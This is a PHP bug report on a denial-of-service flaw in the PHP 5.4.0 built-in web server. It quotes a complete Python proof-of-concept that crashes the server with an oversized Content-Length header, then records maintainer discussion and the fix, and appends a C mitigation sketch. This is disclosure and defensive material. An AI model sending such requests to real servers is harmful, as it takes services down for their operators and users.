Bug #61509 In-built webserver denial-of-service
Submitted: 2012-03-26 12:37 UTC Modified: 2013-08-01 22:19 UTC
Votes:4
Avg. Score:3.0 ± 2.0
Reproduced:1 of 2 (50.0%)
Same Version:1 (100.0%)
Same OS:1 (100.0%)
From: pajoye@php.net Assigned: yohgaki (profile)
Status: Closed Package: CGI/CLI related
PHP Version: 5.4.0 OS: *
Private report: No CVE-ID: None
 [2012-03-26 12:37 UTC] pajoye@php.net
Description:
------------
PHP version 5.4.0 built-in web server denial of service proof of concept exploit.


via http://packetstormsecurity.org/files/111163/php540-dos.txt

Test script:
---------------
#!/usr/bin/python
 
# Title:      PHP 5.4.0 Built-in Web Server DoS PoC
# Date:       16 March 2012
# Author:     ls (contact@kaankivilcim.com)
# Reference:  https://bugs.php.net/bug.php?id=61461
# Comments:   Fixed in PHP 5.4.1RC1-DEV and 5.5.0-DEV
 
# The value of the Content-Length header is passed directly to a pemalloc() call in sapi/cli/php_cli_server.c
# on line 1538. The inline function defined within Zend/zend_alloc.h for malloc() will fail, and will terminate
# the process with the error message "Out of memory".
#
# 1537 if (!client->request.content) {
# 1538   client->request.content = pemalloc(parser->content_length, 1);
# 1539   client->request.content_len = 0;
# 1540 }
#
# PHP 5.4.0 Development Server started at Tue Mar 13 19:41:45 2012
# Listening on 127.0.0.1:80
# Document root is /tmp
# Press Ctrl-C to quit.
# Out of memory
 
import socket, sys
 
target = "127.0.0.1"
port   = 80;
 
request  = "POST / HTTP/1.1\n"
request += "Content-Type: application/x-www-form-urlencoded\n"
request += "Content-Length: 2147483638\n\n" # <-- Choose size larger than the available memory on target
request += "A=B\n\n"
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
try:
  s.connect((target, port))
except:
  print "[-] Connection to %s:%s failed!" % (target, port)
  sys.exit(0)
 
print "[+] Sending HTTP request. Check for crash on target."
 
s.send(request)
s.close()



 [2012-03-27 20:03 UTC] sixd@php.net
-Summary: DOS
+Summary: In-built webserver denial-of-service
 [2012-03-27 20:03 UTC] sixd@php.net
For the record, note the comment in the documentation:
"This web server is designed for developmental purposes only, and should not be 
used in production."
 [2012-03-27 20:06 UTC] stas@php.net
-Type: Security
+Type: Bug
 [2012-03-27 20:07 UTC] stas@php.net
Built-in webserver is a development module, I see no reason to classify bugs on 
it as security.
 [2013-08-01 22:19 UTC] yohgaki@php.net
-Status: Open
+Status: Closed
-Assigned To:
+Assigned To: yohgaki
 [2013-08-01 22:19 UTC] yohgaki@php.net
The current code compares the length of the parsed data and ignores it as an invalid request.
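Added example, not part of the report and not PHP's own code: a C sketch of the general mitigation for the pattern quoted in the test script, where the client-declared Content-Length sized the allocation directly. Here the declared length is checked against a cap before anything is allocated, and the buffer grows only as body bytes actually arrive. The names `body_buf`, `body_begin`, `body_append` and the `MAX_BODY` limit are assumptions made for illustration, and the inputs in `main` are constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define MAX_BODY (8u * 1024u * 1024u) /* assumed policy cap, not a PHP constant */

typedef struct {
    char    *content;
    size_t   content_len; /* bytes actually received so far */
    size_t   cap;         /* bytes currently allocated */
    uint64_t declared;    /* value of the Content-Length header */
} body_buf;

/* Validate the declared length before any memory is reserved.
 * Returns 0 on success, -1 if the request must be rejected. */
int body_begin(body_buf *b, uint64_t declared) {
    memset(b, 0, sizeof *b);
    if (declared > MAX_BODY) return -1;
    b->declared = declared;
    return 0;
}

/* Append one chunk of body data; memory grows with received bytes only. */
int body_append(body_buf *b, const char *at, size_t n) {
    if (n == 0) return 0;
    if (n > b->declared - b->content_len) return -1; /* more data than declared */
    size_t need = b->content_len + n;
    if (need > b->cap) {
        size_t ncap = b->cap ? b->cap : 4096;
        while (ncap < need) ncap *= 2;
        if (ncap > b->declared) ncap = (size_t)b->declared;
        char *p = realloc(b->content, ncap);
        if (!p) return -1; /* fail this request, keep the server process alive */
        b->content = p;
        b->cap = ncap;
    }
    memcpy(b->content + b->content_len, at, n);
    b->content_len = need;
    return 0;
}

int main(void) {
    body_buf b;
    int big = body_begin(&b, 2147483638ULL); /* header value from the report */
    int ok = body_begin(&b, 3) || body_append(&b, "A=B", 3);
    printf("oversized: %d, small body: %d\n", big, ok);
    free(b.content);
    return 0;
}
```

A caller would answer a `-1` from either function with an error response and close the connection, so an allocation failure ends one request instead of the whole server.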
 